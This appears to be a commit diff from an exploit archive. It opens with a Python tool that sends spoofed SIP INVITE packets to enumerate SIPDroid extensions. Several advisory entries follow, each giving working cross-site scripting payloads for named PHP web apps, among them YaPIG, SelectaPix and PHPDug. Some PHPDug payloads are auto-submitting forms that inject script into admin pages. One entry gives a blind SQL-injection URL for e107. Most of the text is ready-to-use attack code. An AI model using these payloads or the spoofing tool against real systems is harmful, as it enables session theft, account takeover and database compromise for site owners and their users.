# myHelper -- myHelper.py should be placed at the same diretory of
SIPDroid-Extension_Enum.py
#
# This software is based on some functions of sipvicious-0.2.6.
#
# This code is only for security researches/teaching purposes,use at
your own risk!
#
import sys
import random
import re
from optparse import OptionParser
from socket import *
from myhelper import *
parse = OptionParser()
parse.add_option("-i", "--ip", dest="ip", help="Target IP range (CIDR or
unique IP). (MANDATORY)")
parse.add_option("-s", "--source", dest="source", help="Source IP
number. (MANDATORY)")
parse.add_option("-f", "--srcfake", dest="srcfake", help="Source IP
number (fake).")
parse.add_option("-p", "--dstport", dest="dstport", default=5060,
help="Destine port number (MAMDATORY due to SIPDroid Random port).
(default 5060)")
parse.add_option("-e", "--extension", dest="exten", default=None,
help="Destine extension. (default None)")
parse.add_option("-t", "--tag", dest="tag", default=None, help="Call
TAG. (default random)")
parse.add_option("-v", "--verbose", action="store_true", dest="debug",
default="False", help="Verbose mode - print pakets sent and received.
(default False)")
(options, arg) = parse.parse_args()
if not options.exten:
extension = "SIPDROID"
else:
extension = options.exten
if not options.srcfake:
srcfake = '1.1.1.1'
else:
srcfake = options.srcfake
dstport = int(options.dstport)
if not options.ip or not options.source:
print printmsg("Sintaxe erro. Try %s --help" % sys.argv[0], "WARNING")
sys.exit(1)
else:
dsthost = options.ip
fromhost = options.source
if options.tag is None:
tag = random.getrandbits(22)
else:
tag = options.tag
buf = 1024
addr = (dsthost,dstport)
cid='%s' % str(random.getrandbits(32))
branch=None
srcaddr = (fromhost,5062)
# Create socket
UDPSock = socket(AF_INET,SOCK_DGRAM)
# Binding on 5060
UDPSock.bind(srcaddr)
# Send messages
method = "INVITE"
(header,branch) =
makeRequest(method,extension,dsthost,dsthost,dstport,cid,srcfake,branch,tag)
if(UDPSock.sendto(header, addr)):
sent = True
if options.debug is True:
print printmsg("Data Sent:", "WARNING")
print header
print printmsg("INVITE sent to %s!\n" % dsthost, "Green")
else:
sent = False
# Receive messages
while sent:
try:
UDPSock.settimeout(4)
data,bindaddr = UDPSock.recvfrom(buf)
if options.debug is True:
print printmsg("Data Received:", "WARNING")
print data
if re.search('SIP/2.0 180 Ringing', data):
packet = data.split('\n')
for packetline in packet:
for origin in re.finditer('o\=[a-zA-Z0-9\-]+\@[a-zA-Z0-9.\-]+', packetline):
print printmsg("o=<extension>@<server>: %s\n" % origin.group(0), "Blue")
method = 'CANCEL'
(header, branch) =
makeRequest(method,extension,dsthost,dsthost,dstport,cid,srcfake,branch,tag)
if options.debug is True:
print printmsg("Data Sent:", "WARNING")
print header
UDPSock.sendto(header, addr)
sent = False
except Exception as excpt:
print excpt
print printmsg("OPS... Timeout on receving data or something wrong with
socket... take a look at dest. port number too (-p option).", "WARNING")
sent = False
# Close socket
UDPSock.close()

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47682/info
Web Auction is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Web Auction 0.3.6 is vulnerable; other versions may also be affected.
http://www.example.com/webauction-0.3.6/dataface/lib/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert(0)//

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/47697/info
E2 Photo Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/uploader/index.php/[xss]

13
platforms/php/webapps/35700.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47698/info
YaPIG is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
YaPIG 0.95 is vulnerable; other versions may also be affected.
http://www.example.com/template/default/add_comment_form.php?I_ADD_COMMENT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/admin_task_bar.php?I_ADMIN_TASKS=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/delete_gallery_form.php?I_SELECT_OPT=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/template/default/face_begin.php?I_TITLE=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/slideshow.php?interval=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

12
platforms/php/webapps/35701.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/47701/info
SelectaPix is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
SelectaPix 1.4.1 is vulnerable; other versions may also be affected.
<form action="http://www.example.com/admin/upload.php?albumID=1&parentID=0&request=single" method="post" name="main" id="main">
<input type="hidden" name="uploadername" value=&#039;"><script>alert(document.cookie);</script>&#039;>
<input type="submit" value="OK">
</form>

13
platforms/php/webapps/35702.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/47702/info
Multiple GoT.MY products are prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials; other attacks are possible.
The following are vulnerable:
Classified ADs 2.9.1
Classmates 1.1.1
Deal Informer 4.8.0
http://www.example.com/themes/default/header.inc.php?theme_dir=%22%3E%3Cscript%3E
alert%28document.cookie%29;%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47726/info
WP Ajax Calendar is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
WP Ajax Calendar 1.0 is vulnerability; other versions may also be affected.
http://www.example.com/example.php?y=[xss]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47727/info
PHP Directory Listing is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
PHP Directory Listing script 3.1 is vulnerable; prior versions may also be affected.
http://www.example.com/index.php/[xss]

49
platforms/php/webapps/35708.txt Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/47733/info
PHPDug is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PHPDug 2.0.0 is vulnerable; other versions may also be affected.
1.
<form action="http://www.example.com/add_story.php" method="post" name="main">
<input type="hidden" name="story_url" value=&#039;http://www.example.com/"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="Submit" value="Continue">
</form>
<script>
document.main.submit();
</script>
2.
<form action="http://www.example.com/editprofile.php" method="post" name="main">
<input type="hidden" name="email" value=&#039;email@example.com"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="commentst" value="-4">
<input type="hidden" name="Submit" value="Save Changes">
</form>
<script>
document.main.submit();
</script>
3.
<form action="http://www.example.com/adm/content_add.php" method="post" name="main">
<input type="hidden" name="id" value="999">
<input type="hidden" name="title" value=&#039;page"><script>alert(document.cookie)</script>&#039;>
<input type="hidden" name="contentvalue="content">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
4.
<form action="http://www.example.com/adm/admin_edit.php" method="post" name="main">
<input type="hidden" name="id[1]" value="1">
<input type="hidden" name="username[1]" value=&#039;admin<script>alert("XSS")</script>&#039;>
<input type="hidden" name="password[1]" value="">
<input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/47750/info
e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
e107 0.7.25 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/news.php?extend.9999999%0aAND%0aSUBSTRING(@@version,1,1)=5